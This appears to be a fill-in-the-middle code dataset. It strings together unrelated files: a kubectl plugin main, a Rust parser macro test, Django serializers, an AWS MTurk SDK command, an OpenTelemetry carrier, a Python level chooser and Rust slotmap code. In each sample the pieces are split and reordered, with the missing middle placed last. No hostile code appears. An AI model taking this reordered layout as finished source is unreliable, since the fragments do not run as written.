"github.com/superbrothers/kubectl-open-svc-plugin/pkg/cmd"
"k8s.io/cli-runtime/pkg/genericclioptions"
"k8s.io/klog"
)
func init()
|
func main() {
flags := pflag.NewFlagSet("kubectl-open-svc", pflag.ExitOnError)
pflag.CommandLine = flags
root := cmd.NewCmdOpenService(genericclioptions.IOStreams{In: os.Stdin, Out: os.Stdout, ErrOut: os.Stderr})
if err := root.Execute(); err != nil {
os.Exit(1)
}
}
|
{
// Initialize glog flags
klog.InitFlags(flag.CommandLine)
_ = flag.CommandLine.Set("logtostderr", "true")
}
|
parser_macro.rs
|
#[macro_use]
extern crate combine;
parser! {
pub fn test[Input]()(Input) -> ()
where [Input: ::combine::Stream<Token = char>]
{
use combine::combinator::value;
let _ = ();
fn _test() { }
match Some(1) {
Some(_) => (),
None => (),
}
value(())
}
}
parser! {
pub fn test_that_parsers_with_unnamed_types_can_be_in_same_scope[Input]()(Input) -> ()
where [Input: ::combine::Stream<Token = char>]
{
use combine::combinator::value;
value(())
}
}
#[test]
fn
|
() {
test::<&str>();
test_that_parsers_with_unnamed_types_can_be_in_same_scope::<&str>();
}
|
test_that_we_dont_need_imports_for_this_macro_to_work
|
serializers.py
|
from rest_framework.serializers import ModelSerializer
from api.models import Stock_En_Tienda, Tienda, Categoria, SubCategoria, Producto
class Stock_En_TiendaSerializer(ModelSerializer):
|
class Meta:
model = Stock_En_Tienda
depth = 2
fields = '__all__'
class TiendaSerializer(ModelSerializer):
class Meta:
model = Tienda
depth = 2
fields = '__all__'
class CategoriaSerializer(ModelSerializer):
class Meta:
model = Categoria
depth = 2
fields = '__all__'
class SubCategoriaSerializer(ModelSerializer):
class Meta:
model = SubCategoria
depth = 2
fields = '__all__'
class ProductoSerializer(ModelSerializer):
class Meta:
model = Producto
depth = 2
fields = '__all__'
| |
NotifyWorkersCommand.ts
|
import { MTurkClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../MTurkClient.ts";
import { NotifyWorkersRequest, NotifyWorkersResponse } from "../models/models_0.ts";
import {
deserializeAws_json1_1NotifyWorkersCommand,
serializeAws_json1_1NotifyWorkersCommand,
} from "../protocols/Aws_json1_1.ts";
import { getSerdePlugin } from "../../middleware-serde/mod.ts";
import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "../../protocol-http/mod.ts";
import { Command as $Command } from "../../smithy-client/mod.ts";
import {
FinalizeHandlerArguments,
Handler,
HandlerExecutionContext,
MiddlewareStack,
HttpHandlerOptions as __HttpHandlerOptions,
MetadataBearer as __MetadataBearer,
SerdeContext as __SerdeContext,
} from "../../types/mod.ts";
export interface NotifyWorkersCommandInput extends NotifyWorkersRequest {}
export interface NotifyWorkersCommandOutput extends NotifyWorkersResponse, __MetadataBearer {}
/**
* <p>
* The
* <code>NotifyWorkers</code>
* operation sends an email to one or more Workers that you specify with
* the Worker ID. You can specify up to 100 Worker IDs to send the same
* message with a single call to the NotifyWorkers operation. The
* NotifyWorkers operation will send a notification email to a Worker
* only if you have previously approved or rejected work from the
* Worker.
* </p>
* @example
* Use a bare-bones client and the command you need to make an API call.
* ```javascript
* import { MTurkClient, NotifyWorkersCommand } from "../../client-mturk/mod.ts";
* // const { MTurkClient, NotifyWorkersCommand } = require("@aws-sdk/client-mturk"); // CommonJS import
* const client = new MTurkClient(config);
* const command = new NotifyWorkersCommand(input);
* const response = await client.send(command);
* ```
*
* @see {@link NotifyWorkersCommandInput} for command's `input` shape.
* @see {@link NotifyWorkersCommandOutput} for command's `response` shape.
* @see {@link MTurkClientResolvedConfig | config} for command's `input` shape.
*
*/
export class
|
extends $Command<
NotifyWorkersCommandInput,
NotifyWorkersCommandOutput,
MTurkClientResolvedConfig
> {
// Start section: command_properties
// End section: command_properties
constructor(readonly input: NotifyWorkersCommandInput) {
// Start section: command_constructor
super();
// End section: command_constructor
}
/**
* @internal
*/
resolveMiddleware(
clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>,
configuration: MTurkClientResolvedConfig,
options?: __HttpHandlerOptions
): Handler<NotifyWorkersCommandInput, NotifyWorkersCommandOutput> {
this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize));
const stack = clientStack.concat(this.middlewareStack);
const { logger } = configuration;
const clientName = "MTurkClient";
const commandName = "NotifyWorkersCommand";
const handlerExecutionContext: HandlerExecutionContext = {
logger,
clientName,
commandName,
inputFilterSensitiveLog: NotifyWorkersRequest.filterSensitiveLog,
outputFilterSensitiveLog: NotifyWorkersResponse.filterSensitiveLog,
};
const { requestHandler } = configuration;
return stack.resolve(
(request: FinalizeHandlerArguments<any>) =>
requestHandler.handle(request.request as __HttpRequest, options || {}),
handlerExecutionContext
);
}
private serialize(input: NotifyWorkersCommandInput, context: __SerdeContext): Promise<__HttpRequest> {
return serializeAws_json1_1NotifyWorkersCommand(input, context);
}
private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<NotifyWorkersCommandOutput> {
return deserializeAws_json1_1NotifyWorkersCommand(output, context);
}
// Start section: command_body_extra
// End section: command_body_extra
}
|
NotifyWorkersCommand
|
tracer.go
|
package opentelemetry
import (
"context"
"go.opentelemetry.io/otel/baggage"
"go.opentelemetry.io/otel/propagation"
sdktrace "go.opentelemetry.io/otel/trace"
"google.golang.org/grpc/metadata"
)
// assert that metadataSupplier implements the TextMapCarrier interface
var _ propagation.TextMapCarrier = new(metadataSupplier)
type metadataSupplier struct {
metadata *metadata.MD
}
func (s *metadataSupplier) Get(key string) string {
values := s.metadata.Get(key)
if len(values) == 0 {
return ""
}
return values[0]
|
}
func (s *metadataSupplier) Set(key, value string) {
s.metadata.Set(key, value)
}
func (s *metadataSupplier) Keys() []string {
out := make([]string, 0, len(*s.metadata))
for key := range *s.metadata {
out = append(out, key)
}
return out
}
// Inject injects the metadata into ctx.
func Inject(ctx context.Context, p propagation.TextMapPropagator, metadata *metadata.MD) {
p.Inject(ctx, &metadataSupplier{
metadata: metadata,
})
}
// Extract extracts the metadata from ctx.
func Extract(ctx context.Context, p propagation.TextMapPropagator, metadata *metadata.MD) (
baggage.Baggage, sdktrace.SpanContext) {
ctx = p.Extract(ctx, &metadataSupplier{
metadata: metadata,
})
return baggage.FromContext(ctx), sdktrace.SpanContextFromContext(ctx)
}
| |
level.py
|
# Construir lógica para escoger el nivel
##################################################
#pass
if n_pregunta <= int(p_level):
level = "basicas"
elif n_pregunta <= 2 * p_level:
level = "intermedias"
else:
level = "avanzadas"
##################################################
return level
if __name__ == '__main__':
# verificar resultados
print(choose_level(2, 2)) # básicas
print(choose_level(3, 2)) # intermedias
print(choose_level(7, 2)) # avanzadas
print(choose_level(4, 3)) # intermedias
|
def choose_level(n_pregunta, p_level):
|
|
shopping-list.model.ts
|
export class
|
{
}
|
ShoppingList
|
secondary.rs
|
//! Contains the secondary map implementation.
use super::{is_older_version, Key, KeyData};
#[cfg(all(nightly, any(doc, feature = "unstable")))]
use alloc::collections::TryReserveError;
use alloc::vec::Vec;
use core::hint::unreachable_unchecked;
use core::iter::{Enumerate, Extend, FromIterator, FusedIterator};
use core::marker::PhantomData;
use core::mem::replace;
#[allow(unused_imports)] // MaybeUninit is only used on nightly at the moment.
use core::mem::MaybeUninit;
use core::num::NonZeroU32;
use core::ops::{Index, IndexMut};
// This representation works because we don't have to store the versions
// of removed elements.
#[derive(Debug, Clone)]
enum Slot<T> {
Occupied { value: T, version: NonZeroU32 },
Vacant,
}
use self::Slot::Occupied;
use self::Slot::Vacant;
impl<T> Slot<T> {
pub fn new_occupied(version: u32, value: T) -> Self {
Occupied {
value,
version: unsafe { NonZeroU32::new_unchecked(version | 1u32) },
}
}
pub fn new_vacant() -> Self {
Vacant
}
// Is this slot occupied?
#[inline(always)]
pub fn occupied(&self) -> bool {
match self {
Occupied { .. } => true,
Vacant => false,
}
}
#[inline(always)]
pub fn version(&self) -> u32 {
match self {
Occupied { version, .. } => version.get(),
Vacant => 0,
}
}
pub unsafe fn get_unchecked(&self) -> &T {
match self {
Occupied { value, .. } => value,
Vacant => unreachable_unchecked(),
}
}
pub unsafe fn get_unchecked_mut(&mut self) -> &mut T {
match self {
Occupied { value, .. } => value,
Vacant => unreachable_unchecked(),
}
}
pub fn into_option(self) -> Option<T> {
match self {
Occupied { value, .. } => Some(value),
Vacant => None,
}
}
}
/// Secondary map, associate data with previously stored elements in a slot map.
///
/// A [`SecondaryMap`] allows you to efficiently store additional information
/// for each element in a slot map. You can have multiple secondary maps per
/// slot map, but not multiple slot maps per secondary map. It is safe but
/// unspecified behavior if you use keys from multiple different slot maps in
/// the same [`SecondaryMap`].
///
/// A [`SecondaryMap`] does not leak memory even if you never remove elements.
/// In return, when you remove a key from the primary slot map, after any insert
/// the space associated with the removed element may be reclaimed. Don't expect
/// the values associated with a removed key to stick around after an insertion
/// has happened!
///
/// Finally a note on memory complexity, the [`SecondaryMap`] can use memory for
/// each slot in the primary slot map, and has to iterate over every slot during
/// iteration, regardless of whether you have inserted an associative value at
/// that key or not. If you have some property that you only expect to set for a
/// minority of keys, use a [`SparseSecondaryMap`](crate::SparseSecondaryMap),
/// which is backed by a [`HashMap`](std::collections::HashMap).
///
/// Example usage:
///
/// ```
/// # use slotmap::*;
/// let mut players = SlotMap::new();
/// let mut health = SecondaryMap::new();
/// let mut ammo = SecondaryMap::new();
///
/// let alice = players.insert("alice");
/// let bob = players.insert("bob");
///
/// for p in players.keys() {
/// health.insert(p, 100);
/// ammo.insert(p, 30);
/// }
///
/// // Alice attacks Bob with all her ammo!
/// health[bob] -= ammo[alice] * 3;
/// ammo[alice] = 0;
/// ```
#[derive(Debug, Clone)]
pub struct SecondaryMap<K: Key, V> {
slots: Vec<Slot<V>>,
num_elems: usize,
_k: PhantomData<fn(K) -> K>,
}
impl<K: Key, V> SecondaryMap<K, V> {
/// Constructs a new, empty [`SecondaryMap`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::new();
/// ```
pub fn new() -> Self {
Self::with_capacity(0)
}
/// Creates an empty [`SecondaryMap`] with the given capacity of slots.
///
/// The secondary map will not reallocate until it holds at least `capacity`
/// slots. Even inserting a single key-value pair might require as many
/// slots as the slot map the key comes from, so it's recommended to match
/// the capacity of a secondary map to its corresponding slot map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm: SlotMap<_, i32> = SlotMap::with_capacity(10);
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(sm.capacity());
/// ```
pub fn with_capacity(capacity: usize) -> Self {
let mut slots = Vec::with_capacity(capacity + 1); // Sentinel.
slots.push(Slot::new_vacant());
Self {
slots,
num_elems: 0,
_k: PhantomData,
}
}
/// Returns the number of elements in the secondary map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert_eq!(squared.len(), 0);
/// squared.insert(k, 16);
/// assert_eq!(squared.len(), 1);
/// ```
pub fn len(&self) -> usize {
self.num_elems
}
/// Returns if the secondary map is empty.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::new();
/// assert!(sec.is_empty());
/// ```
pub fn is_empty(&self) -> bool {
self.num_elems == 0
}
/// Returns the number of elements the [`SecondaryMap`] can hold without
/// reallocating.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// ```
pub fn capacity(&self) -> usize {
self.slots.capacity() - 1 // Sentinel.
}
/// Sets the capacity of the [`SecondaryMap`] to `new_capacity`, if it is
/// bigger than the current capacity.
///
/// It is recommended to set the capacity of a [`SecondaryMap`] to the
/// capacity of its corresponding slot map before inserting many new
/// elements to prevent frequent reallocations. The collection may reserve
/// more space than requested.
///
/// # Panics
///
/// Panics if the new allocation size overflows [`usize`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// sec.set_capacity(1000);
/// assert!(sec.capacity() >= 1000);
/// ```
pub fn set_capacity(&mut self, new_capacity: usize) {
let new_capacity = new_capacity + 1; // Sentinel.
if new_capacity > self.slots.capacity() {
let needed = new_capacity - self.slots.len();
self.slots.reserve(needed);
}
}
/// Tries to set the capacity of the [`SecondaryMap`] to `new_capacity`, if it
/// is bigger than the current capacity.
///
/// It is recommended to set the capacity of a [`SecondaryMap`] to the
/// capacity of its corresponding slot map before inserting many new
/// elements to prevent frequent reallocations. The collection may reserve
/// more space than requested.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// sec.try_set_capacity(1000).unwrap();
/// assert!(sec.capacity() >= 1000);
/// ```
#[cfg(all(nightly, any(doc, feature = "unstable")))]
#[cfg_attr(all(nightly, doc), doc(cfg(feature = "unstable")))]
pub fn try_set_capacity(&mut self, new_capacity: usize) -> Result<(), TryReserveError> {
let new_capacity = new_capacity + 1; // Sentinel.
if new_capacity > self.slots.capacity() {
let needed = new_capacity - self.slots.len();
self.slots.try_reserve(needed)
} else {
Ok(())
}
}
/// Returns [`true`] if the secondary map contains `key`.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert!(!squared.contains_key(k));
/// squared.insert(k, 16);
/// assert!(squared.contains_key(k));
/// ```
pub fn contains_key(&self, key: K) -> bool {
let kd = key.data();
self.slots
.get(kd.idx as usize)
.map_or(false, |slot| slot.version() == kd.version.get())
}
/// Inserts a value into the secondary map at the given `key`. Can silently
/// fail and return `None` if `key` was removed from the originating slot
/// map.
///
/// Returns [`None`] if this key was not present in the map, the old value
/// otherwise.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert_eq!(squared.insert(k, 0), None);
/// assert_eq!(squared.insert(k, 4), Some(0));
/// // You don't have to use insert if the key is already in the secondary map.
/// squared[k] *= squared[k];
/// assert_eq!(squared[k], 16);
/// ```
pub fn insert(&mut self, key: K, value: V) -> Option<V> {
if key.is_null() {
return None;
}
let kd = key.data();
self.slots
.extend((self.slots.len()..=kd.idx as usize).map(|_| Slot::new_vacant()));
let slot = &mut self.slots[kd.idx as usize];
if slot.version() == kd.version.get() {
// Is always occupied.
return Some(replace(unsafe { slot.get_unchecked_mut() }, value));
}
if slot.occupied() {
// Don't replace existing newer values.
if is_older_version(kd.version.get(), slot.version()) {
return None;
}
} else {
self.num_elems += 1;
}
*slot = Slot::new_occupied(kd.version.get(), value);
None
}
/// Removes a key from the secondary map, returning the value at the key if
/// the key was not previously removed. If `key` was removed from the
/// originating slot map, its corresponding entry in the secondary map may
/// or may not already be removed.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut squared = SecondaryMap::new();
/// let k = sm.insert(4);
/// squared.insert(k, 16);
/// squared.remove(k);
/// assert!(!squared.contains_key(k));
///
/// // It's not necessary to remove keys deleted from the primary slot map, they
/// // get deleted automatically when their slots are reused on a subsequent insert.
/// squared.insert(k, 16);
/// sm.remove(k); // Remove k from the slot map, making an empty slot.
/// let new_k = sm.insert(2); // Since sm only has one empty slot, this reuses it.
/// assert!(!squared.contains_key(new_k)); // Space reuse does not mean equal keys.
/// assert!(squared.contains_key(k)); // Slot has not been reused in squared yet.
/// squared.insert(new_k, 4);
/// assert!(!squared.contains_key(k)); // Old key is no longer available.
/// ```
pub fn remove(&mut self, key: K) -> Option<V> {
let kd = key.data();
if let Some(slot) = self.slots.get_mut(kd.idx as usize) {
if slot.version() == kd.version.get() {
self.num_elems -= 1;
return replace(slot, Slot::new_vacant()).into_option();
}
}
None
}
/// Retains only the elements specified by the predicate.
///
/// In other words, remove all key-value pairs `(k, v)` such that
/// `f(k, &mut v)` returns false. This method invalidates any removed keys.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k1 = sm.insert(0); sec.insert(k1, 10);
/// let k2 = sm.insert(1); sec.insert(k2, 11);
/// let k3 = sm.insert(2); sec.insert(k3, 12);
///
/// sec.retain(|key, val| key == k1 || *val == 11);
///
/// assert!(sec.contains_key(k1));
/// assert!(sec.contains_key(k2));
/// assert!(!sec.contains_key(k3));
/// assert_eq!(sec.len(), 2);
/// ```
pub fn retain<F>(&mut self, mut f: F)
where
F: FnMut(K, &mut V) -> bool,
{
for (i, slot) in self.slots.iter_mut().enumerate() {
if let Occupied { value, version } = slot {
let key = KeyData::new(i as u32, version.get()).into();
if !f(key, value) {
self.num_elems -= 1;
*slot = Slot::new_vacant();
}
}
}
}
/// Clears the secondary map. Keeps the allocated memory for reuse.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// for i in 0..10 {
/// sec.insert(sm.insert(i), i);
/// }
/// assert_eq!(sec.len(), 10);
/// sec.clear();
/// assert_eq!(sec.len(), 0);
/// ```
pub fn
|
(&mut self) {
self.drain();
}
/// Clears the slot map, returning all key-value pairs in arbitrary order as
/// an iterator. Keeps the allocated memory for reuse.
///
/// When the iterator is dropped all elements in the slot map are removed,
/// even if the iterator was not fully consumed. If the iterator is not
/// dropped (using e.g. [`std::mem::forget`]), only the elements that were
/// iterated over are removed.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::iter::FromIterator;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(0);
/// let mut sec = SecondaryMap::new();
/// sec.insert(k, 1);
/// let v: Vec<_> = sec.drain().collect();
/// assert_eq!(sec.len(), 0);
/// assert_eq!(v, vec![(k, 1)]);
/// ```
pub fn drain(&mut self) -> Drain<K, V> {
Drain {
cur: 1,
num_left: self.len(),
sm: self,
}
}
/// Returns a reference to the value corresponding to the key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// assert_eq!(sec.get(key), Some(&"bar"));
/// sec.remove(key);
/// assert_eq!(sec.get(key), None);
/// ```
pub fn get(&self, key: K) -> Option<&V> {
let kd = key.data();
self.slots
.get(kd.idx as usize)
.filter(|slot| slot.version() == kd.version.get())
.map(|slot| unsafe { slot.get_unchecked() })
}
/// Returns a reference to the value corresponding to the key without
/// version or bounds checking.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true. Otherwise it is
/// potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// assert_eq!(unsafe { sec.get_unchecked(key) }, &"bar");
/// sec.remove(key);
/// // sec.get_unchecked(key) is now dangerous!
/// ```
pub unsafe fn get_unchecked(&self, key: K) -> &V {
debug_assert!(self.contains_key(key));
let slot = self.slots.get_unchecked(key.data().idx as usize);
slot.get_unchecked()
}
/// Returns a mutable reference to the value corresponding to the key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("test");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, 3.5);
/// if let Some(x) = sec.get_mut(key) {
/// *x += 3.0;
/// }
/// assert_eq!(sec[key], 6.5);
/// ```
pub fn get_mut(&mut self, key: K) -> Option<&mut V> {
let kd = key.data();
self.slots
.get_mut(kd.idx as usize)
.filter(|slot| slot.version() == kd.version.get())
.map(|slot| unsafe { slot.get_unchecked_mut() })
}
/// Returns a mutable reference to the value corresponding to the key
/// without version or bounds checking.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true. Otherwise it is
/// potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// unsafe { *sec.get_unchecked_mut(key) = "baz" };
/// assert_eq!(sec[key], "baz");
/// sec.remove(key);
/// // sec.get_unchecked_mut(key) is now dangerous!
/// ```
pub unsafe fn get_unchecked_mut(&mut self, key: K) -> &mut V {
debug_assert!(self.contains_key(key));
let slot = self.slots.get_unchecked_mut(key.data().idx as usize);
slot.get_unchecked_mut()
}
/// Returns mutable references to the values corresponding to the given
/// keys. All keys must be valid and disjoint, otherwise None is returned.
///
/// Requires at least stable Rust version 1.51.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let ka = sm.insert(()); sec.insert(ka, "butter");
/// let kb = sm.insert(()); sec.insert(kb, "apples");
/// let kc = sm.insert(()); sec.insert(kc, "charlie");
/// sec.remove(kc); // Make key c invalid.
/// assert_eq!(sec.get_disjoint_mut([ka, kb, kc]), None); // Has invalid key.
/// assert_eq!(sec.get_disjoint_mut([ka, ka]), None); // Not disjoint.
/// let [a, b] = sec.get_disjoint_mut([ka, kb]).unwrap();
/// std::mem::swap(a, b);
/// assert_eq!(sec[ka], "apples");
/// assert_eq!(sec[kb], "butter");
/// ```
#[cfg(has_min_const_generics)]
pub fn get_disjoint_mut<const N: usize>(&mut self, keys: [K; N]) -> Option<[&mut V; N]> {
// Create an uninitialized array of `MaybeUninit`. The `assume_init` is
// safe because the type we are claiming to have initialized here is a
// bunch of `MaybeUninit`s, which do not require initialization.
let mut ptrs: [MaybeUninit<*mut V>; N] = unsafe { MaybeUninit::uninit().assume_init() };
let mut slot_versions: [MaybeUninit<u32>; N] =
unsafe { MaybeUninit::uninit().assume_init() };
let mut i = 0;
while i < N {
let kd = keys[i].data();
match self.slots.get_mut(kd.idx as usize) {
Some(Occupied { version, value }) if *version == kd.version => {
// This key is valid, and the slot is occupied. Temporarily
// set the version to 2 so duplicate keys would show up as
// invalid, since keys always have an odd version. This
// gives us a linear time disjointness check.
ptrs[i] = MaybeUninit::new(&mut *value);
slot_versions[i] = MaybeUninit::new(version.get());
*version = NonZeroU32::new(2).unwrap();
}
_ => break,
}
i += 1;
}
// Undo temporary unoccupied markings.
for j in 0..i {
let idx = keys[j].data().idx as usize;
unsafe {
match self.slots.get_mut(idx) {
Some(Occupied { version, .. }) => {
*version = NonZeroU32::new_unchecked(slot_versions[j].assume_init());
}
_ => unreachable_unchecked(),
}
}
}
if i == N {
// All were valid and disjoint.
Some(unsafe { core::mem::transmute_copy::<_, [&mut V; N]>(&ptrs) })
} else {
None
}
}
/// Returns mutable references to the values corresponding to the given
/// keys. All keys must be valid and disjoint.
///
/// Requires at least stable Rust version 1.51.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true for every given
/// key and no two keys are equal. Otherwise it is potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let ka = sm.insert(()); sec.insert(ka, "butter");
/// let kb = sm.insert(()); sec.insert(kb, "apples");
/// let [a, b] = unsafe { sec.get_disjoint_unchecked_mut([ka, kb]) };
/// std::mem::swap(a, b);
/// assert_eq!(sec[ka], "apples");
/// assert_eq!(sec[kb], "butter");
/// ```
#[cfg(has_min_const_generics)]
pub unsafe fn get_disjoint_unchecked_mut<const N: usize>(
&mut self,
keys: [K; N],
) -> [&mut V; N] {
// Safe, see get_disjoint_mut.
let mut ptrs: [MaybeUninit<*mut V>; N] = MaybeUninit::uninit().assume_init();
for i in 0..N {
ptrs[i] = MaybeUninit::new(self.get_unchecked_mut(keys[i]));
}
core::mem::transmute_copy::<_, [&mut V; N]>(&ptrs)
}
/// An iterator visiting all key-value pairs in arbitrary order. The
/// iterator element type is `(K, &'a V)`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(0); sec.insert(k0, 10);
/// let k1 = sm.insert(1); sec.insert(k1, 11);
/// let k2 = sm.insert(2); sec.insert(k2, 12);
///
/// for (k, v) in sm.iter() {
/// println!("key: {:?}, val: {}", k, v);
/// }
/// ```
pub fn iter(&self) -> Iter<K, V> {
Iter {
num_left: self.num_elems,
slots: self.slots.iter().enumerate(),
_k: PhantomData,
}
}
/// An iterator visiting all key-value pairs in arbitrary order, with
/// mutable references to the values. The iterator element type is
/// `(K, &'a mut V)`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
///
/// for (k, v) in sec.iter_mut() {
/// if k != k1 {
/// *v *= -1;
/// }
/// }
///
/// assert_eq!(sec[k0], -10);
/// assert_eq!(sec[k1], 20);
/// assert_eq!(sec[k2], -30);
/// ```
pub fn iter_mut(&mut self) -> IterMut<K, V> {
IterMut {
num_left: self.num_elems,
slots: self.slots.iter_mut().enumerate(),
_k: PhantomData,
}
}
/// An iterator visiting all keys in arbitrary order. The iterator element
/// type is `K`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
/// let keys: HashSet<_> = sec.keys().collect();
/// let check: HashSet<_> = vec![k0, k1, k2].into_iter().collect();
/// assert_eq!(keys, check);
/// ```
pub fn keys(&self) -> Keys<K, V> {
Keys { inner: self.iter() }
}
/// An iterator visiting all values in arbitrary order. The iterator element
/// type is `&'a V`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
/// let values: HashSet<_> = sec.values().collect();
/// let check: HashSet<_> = vec![&10, &20, &30].into_iter().collect();
/// assert_eq!(values, check);
/// ```
pub fn values(&self) -> Values<K, V> {
Values { inner: self.iter() }
}
/// An iterator visiting all values mutably in arbitrary order. The iterator
/// element type is `&'a mut V`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// sec.insert(sm.insert(1), 10);
/// sec.insert(sm.insert(2), 20);
/// sec.insert(sm.insert(3), 30);
/// sec.values_mut().for_each(|n| { *n *= 3 });
/// let values: HashSet<_> = sec.into_iter().map(|(_k, v)| v).collect();
/// let check: HashSet<_> = vec![30, 60, 90].into_iter().collect();
/// assert_eq!(values, check);
/// ```
pub fn values_mut(&mut self) -> ValuesMut<K, V> {
ValuesMut {
inner: self.iter_mut(),
}
}
/// Gets the given key's corresponding [`Entry`] in the map for in-place
/// manipulation. May return [`None`] if the key was removed from the
/// originating slot map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k = sm.insert(1);
/// let v = sec.entry(k).unwrap().or_insert(10);
/// assert_eq!(*v, 10);
/// ```
pub fn entry(&mut self, key: K) -> Option<Entry<K, V>> {
if key.is_null() {
return None;
}
let kd = key.data();
// Ensure the slot exists so the Entry implementation can safely assume
// the slot always exists without checking.
self.slots
.extend((self.slots.len()..=kd.idx as usize).map(|_| Slot::new_vacant()));
let slot = unsafe { self.slots.get_unchecked(kd.idx as usize) };
if kd.version.get() == slot.version() {
Some(Entry::Occupied(OccupiedEntry {
map: self,
kd,
_k: PhantomData,
}))
} else if is_older_version(kd.version.get(), slot.version()) {
None
} else {
Some(Entry::Vacant(VacantEntry {
map: self,
kd,
_k: PhantomData,
}))
}
}
}
impl<K: Key, V> Default for SecondaryMap<K, V> {
fn default() -> Self {
Self::new()
}
}
impl<K: Key, V> Index<K> for SecondaryMap<K, V> {
type Output = V;
fn index(&self, key: K) -> &V {
match self.get(key) {
Some(r) => r,
None => panic!("invalid SecondaryMap key used"),
}
}
}
impl<K: Key, V> IndexMut<K> for SecondaryMap<K, V> {
fn index_mut(&mut self, key: K) -> &mut V {
match self.get_mut(key) {
Some(r) => r,
None => panic!("invalid SecondaryMap key used"),
}
}
}
impl<K: Key, V: PartialEq> PartialEq for SecondaryMap<K, V> {
fn eq(&self, other: &Self) -> bool {
if self.len() != other.len() {
return false;
}
self.iter().all(|(key, value)| {
other
.get(key)
.map_or(false, |other_value| *value == *other_value)
})
}
}
